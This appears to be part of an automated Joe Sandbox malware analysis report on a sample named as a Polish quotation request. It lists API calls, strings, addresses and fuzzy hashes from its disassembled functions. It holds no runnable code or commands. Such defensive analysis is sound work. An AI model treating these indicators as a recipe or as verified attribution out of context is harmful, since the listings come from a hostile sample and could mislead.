                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                                                                                                                                                      • _printf.LIBCMT ref: 0045E595
                                                                                                                                                                                                                                                      • _printf.LIBCMT ref: 0045E5B7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                                                                                                                                                      • API String ID: 3590180749-2894483878
                                                                                                                                                                                                                                                      • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                                                                                                      • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                                                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3969911579-0
                                                                                                                                                                                                                                                      • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                      • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                                                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                                                                                                                                                      • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                                                                                                                                                        • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                                                                                                                                                      • String ID: Version$\TypeLib$interface\
                                                                                                                                                                                                                                                      • API String ID: 656856066-939221531
                                                                                                                                                                                                                                                      • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                      • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00458194
                                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                      • API String ID: 2255324689-22481851
                                                                                                                                                                                                                                                      • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                      • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                                                                                                                                                      • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                                                                                                                                                      • String ID: ($interface$interface\
                                                                                                                                                                                                                                                      • API String ID: 2231185022-3327702407
                                                                                                                                                                                                                                                      • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                                                                                                      • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                                                                                                                                                      • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                                                                                                                                                      • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 004365F5
                                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                                                                                                                                                      • _strcat.LIBCMT ref: 0043662F
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00436644
                                                                                                                                                                                                                                                      • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00436666
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                                      • API String ID: 2691793716-3771769585
                                                                                                                                                                                                                                                      • Opcode ID: 57f2c181a27470c194a8cdbecf1eb3e0ca51f5c4589d89623b6c5db8a4b939a4
                                                                                                                                                                                                                                                      • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57f2c181a27470c194a8cdbecf1eb3e0ca51f5c4589d89623b6c5db8a4b939a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                                                                                                                                                      • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1350042424-0
                                                                                                                                                                                                                                                      • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                      • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: e458a1a49b2b56e0ac75d97a83cfcf26a1eabdc4e564b16f125673ba34925c8c
                                                                                                                                                                                                                                                      • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e458a1a49b2b56e0ac75d97a83cfcf26a1eabdc4e564b16f125673ba34925c8c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00460502
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                                                                                                                                                      • String ID: ThumbnailClass
                                                                                                                                                                                                                                                      • API String ID: 4123061591-1241985126
                                                                                                                                                                                                                                                      • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                                                                                                      • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                                                                                                        • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                                                                                                        • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                                                                                                        • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                                                                                                                                                      • API String ID: 2483343779-2060113733
                                                                                                                                                                                                                                                      • Opcode ID: 6817a6ec856fbae515f8bb33f78f5e1c2ffd77adef612602a1ed80cc7d67db9d
                                                                                                                                                                                                                                                      • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6817a6ec856fbae515f8bb33f78f5e1c2ffd77adef612602a1ed80cc7d67db9d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
